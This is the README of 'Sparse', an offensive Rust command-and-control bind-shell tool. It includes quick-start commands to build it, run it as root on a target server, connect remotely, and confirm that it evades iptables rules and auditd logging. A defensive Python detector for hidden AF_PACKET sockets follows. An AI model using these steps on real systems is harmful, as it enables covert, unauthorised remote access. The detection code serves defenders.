# Sparse: A Rust C2 framework

Developed using libpcap to enable evading local firewalls and with an eye towards hiding itself from inspection. Deprecated in favor of sparse-v2 before being completely developed; the most significant tool this repository contributes is `sparse-05`.

This repository weaponizes some of the concepts highlighted in [this blog post](https://andrew.riouxs.co/articles/20251017-direct-network-access.html).

## Significant Packages

- [pcap-sys](./pcap-sys): A Rust wrapper around the libpcap library for Linux
- [nl-sys](./nl-sys): A Rust wrapper around the netlink (nl) library on Linux
- [sparse-05](./sparse-05/README.md): A bind shell utility to create bind shells on target servers and connect to them

## Development

This repository is designed to be developed inside a Nix developer shell, obtained with `nix develop`.

## Bind shell

The most mature implementation of Sparse is the Sparse version 0.5 bind shell, which is documented in [its own folder](./sparse-05/README.md).

### Quick start:

- Install the Nix package manager on a Linux system: <https://nixos.org/download/>
- Run `nix --experimental-features 'nix-command flakes' build .#sparse-05-client`
- Generate a Linux server with `result/bin/sparse-05-client generate -t linux service-name`
- Copy to and run on a target system as root
- Connect to it with `result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248`
- Set up a firewall to block all inbound connections with `iptables -P INPUT DROP`, `iptables -F INPUT`; sparse should still be able to connect and operate
- Run `iptstate`, `auditbeat`, or `auditd` from another session to see that no IP or UDP traffic is being logged by the kernel
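
A defender-side check to go with the last Quick start step, added here as an example and not part of the sparse repository: libpcap on Linux captures through AF_PACKET sockets, which the kernel lists in `/proc/net/packet` regardless of netfilter rules. The function names, the sample table and the allowlist are assumptions made for illustration.

```python
import os

# Constructed sample in the layout of /proc/net/packet (not captured from a real host).
SAMPLE = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a1c01d2e000 3      3    0003   2     1 0      0      48211
ffff9a1c0443b800 3      2    888e   3     1 0      0      19004
"""

def parse_packet_table(text):
    """Return one dict per AF_PACKET socket listed in /proc/net/packet text."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header row
        f = line.split()
        if len(f) < 9:
            continue  # tolerate blank or truncated lines
        rows.append({"sock_type": int(f[2]), "proto": int(f[3], 16),  # 0x0003 = ETH_P_ALL
                     "ifindex": int(f[4]), "uid": int(f[7]), "inode": int(f[8])})
    return rows

def socket_owners(proc_root="/proc"):
    """Map socket inode -> set of (pid, comm) from each /proc/<pid>/fd symlink."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            with open(os.path.join(proc_root, pid, "comm")) as fh:
                comm = fh.read().strip()
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:
            continue  # process exited, or we lack permission to read it
        for link in links:
            if link.startswith("socket:[") and link.endswith("]"):
                owners.setdefault(int(link[8:-1]), set()).add((int(pid), comm))
    return owners

def unexpected_packet_sockets(table_text, owners, allowed_comms):
    """Rows whose owner is unknown or outside allowed_comms (a site-specific allowlist)."""
    flagged = []
    for row in parse_packet_table(table_text):
        procs = owners.get(row["inode"], set())
        if not procs or any(comm not in allowed_comms for _, comm in procs):
            flagged.append({**row, "owners": sorted(procs)})
    return flagged

if __name__ == "__main__":  # allowlist below is an assumed, site-specific example
    with open("/proc/net/packet") as fh:
        for hit in unexpected_packet_sockets(fh.read(), socket_owners(), {"wpa_supplicant"}):
            print(hit)
```

Run it as root so every process's `fd` directory is readable; a row with an empty `owners` list means no visible process holds that socket, which is itself worth investigating.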